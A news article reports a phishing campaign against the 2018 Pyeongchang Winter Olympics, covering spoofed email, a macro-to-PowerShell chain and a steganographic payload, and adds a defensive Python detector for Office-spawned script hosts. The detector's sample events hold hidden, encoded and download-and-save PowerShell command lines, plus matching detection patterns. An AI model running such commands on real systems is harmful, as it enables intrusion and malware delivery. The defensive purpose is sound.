Security analysts at McAfee Advanced Threat Research have identified a phishing campaign aimed at the Winter Olympics. The event is to take place in Pyeongchang, South Korea between 9 and 25 February this year.
Details of the phishing campaign were published in a blog by Ryan Sherstobitoff and Jessica Saavedra-Morales.
The emails were sent to [email protected]. A number of other organisations involved in the Winter Olympics were then added to the BCC line. Of particular interest is that the attackers spoofed the sender details. It made the emails appear as if they had come from the South Korea National Counter-Terrorism Center (NCTC). As the NCTC was conducting security drills over the same period, this gave the emails a degree of authenticity.
What do we know about the attack?
The emails contain an infected Microsoft Word document. According to the researchers its file name is: “농식품부, 평창 동계올림픽 대비 축산악취 방지대책 관련기관 회의 개최.doc”. This translates to “Organized by Ministry of Agriculture and Forestry and Pyeongchang Winter Olympics”.
When users open the document it asks them to Enable Content. This initiates a Visual Basic macro which launches a PowerShell script. The script, in turn, downloads an image file that looks innocuous. However, the attackers have used steganography to hide malicious code in the image. That code is then read by the PowerShell script and executed on the target computer.
To evade detection the code is heavily disguised (obfuscated), but that does not stop it from executing. The attackers are also using an encrypted channel back to their server. The two researchers say this is: “likely giving the attacker the ability to execute commands on the victim’s machine and to install additional malware.”
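The chain described above (Word macro launching PowerShell, which then downloads a file) leaves a distinctive trace in endpoint telemetry: an Office application as the parent of a script host. The following Python routine, added here as an illustration and not taken from the McAfee blog or from this article, shows how a detection team could flag that parent-child relationship over process-creation events. The event layout (parent image | child image | command line), the sample lines, and the trait patterns are constructed for the example; a real deployment would read Sysmon or EDR records instead.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed sample process-creation events in a simplified Sysmon-style
# layout (parent image | child image | child command line). These are
# made-up lines for illustration, not telemetry from the incident above.
SAMPLE_EVENTS = [
    r"C:\Windows\explorer.exe|C:\Program Files\Microsoft Office\WINWORD.EXE|WINWORD.EXE /n meeting.doc",
    r"C:\Program Files\Microsoft Office\WINWORD.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -NoP -W Hidden -Enc SQBFAFgA",
    r"C:\Windows\System32\cmd.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe Get-ChildItem",
    r"C:\Program Files\Microsoft Office\EXCEL.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -ExecutionPolicy Bypass -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/logo.png','C:\Users\Public\logo.png')",
]


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


# Office applications that should rarely, if ever, spawn a script host.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Script hosts commonly launched by malicious macros.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line traits that raise severity once an Office-to-script-host
# relationship has already been found. Patterns are illustrative.
COMMAND_LINE_TRAITS: List[Tuple[re.Pattern, str]] = [
    (re.compile(r"-(?:enc|encodedcommand|ec|e)\b", re.I), "encoded command"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I), "hidden window"),
    (re.compile(r"-(?:nop|noprofile)\b", re.I), "profile suppressed"),
    (re.compile(r"-ex(?:ecutionpolicy)?\s+bypass\b", re.I), "execution policy bypass"),
    (re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b", re.I), "remote download"),
]


def basename(path: str) -> str:
    """Return the lower-cased file name component of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> ProcEvent:
    """Split one constructed 'parent|image|cmdline' record into a ProcEvent."""
    parent, image, cmdline = line.split("|", 2)
    return ProcEvent(parent.strip(), image.strip(), cmdline.strip())


def evaluate(event: ProcEvent) -> List[str]:
    """Return the reasons an event is suspicious; an empty list means benign.

    The Office parent -> script host child relationship is the core signal;
    command-line traits only add detail once that relationship is present.
    """
    parent, child = basename(event.parent_image), basename(event.image)
    if parent not in OFFICE_APPS or child not in SCRIPT_HOSTS:
        return []
    reasons = [f"{parent} spawned {child}"]
    for pattern, label in COMMAND_LINE_TRAITS:
        if pattern.search(event.command_line):
            reasons.append(label)
    return reasons


def find_alerts(lines) -> List[Tuple[ProcEvent, List[str]]]:
    """Run every record through evaluate() and keep the ones that fire."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        reasons = evaluate(event)
        if reasons:
            alerts.append((event, reasons))
    return alerts


if __name__ == "__main__":
    for event, reasons in find_alerts(SAMPLE_EVENTS):
        print(f"ALERT {basename(event.image)}: {', '.join(reasons)}")
```

Run against the constructed sample, only the two records where WINWORD.EXE or EXCEL.EXE is the parent of powershell.exe fire; the legitimate cmd.exe-launched PowerShell session and the Word process itself are left alone. Keying on the parent process rather than on command-line keywords is deliberate: obfuscation of the kind the researchers describe changes the command line, but it cannot change which process launched the script host.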
The investigation has also located a compromised server in South Korea and a server in Costa Rica.
What does this mean?
This is not the first attack against the Winter Olympics and it won’t be the last. High-profile events, especially sporting events, are very attractive to hackers. This is about more than just hacking the event itself. Hackers will use the Winter Olympics as a lure in a lot of attacks over the next few months. Some will pretend to be news and some will offer access to exclusive content. All will seek to install malware and take over the end-user computer.
In this case the attackers have demonstrated a number of interesting vectors. They spoofed the email address of the NCTC and used a compromised server. They also created a fake domain using the South Korean Ministry of Agriculture and Forestry details. This would have increased the likelihood of people opening the malicious email attachment, especially as it seemed to come from the same ministry.
One of the more interesting parts of this attack is the use of steganography. This is a technique that has been around for a very long time. However, it has not been part of many disclosed cyber-attacks. This attack could herald a change in that.
IT security teams need to warn their users of attacks around email and websites set up around the Winter Olympics. They also need to consider new email rules around the Winter Olympics. If not, we will see a significant spike in attacks.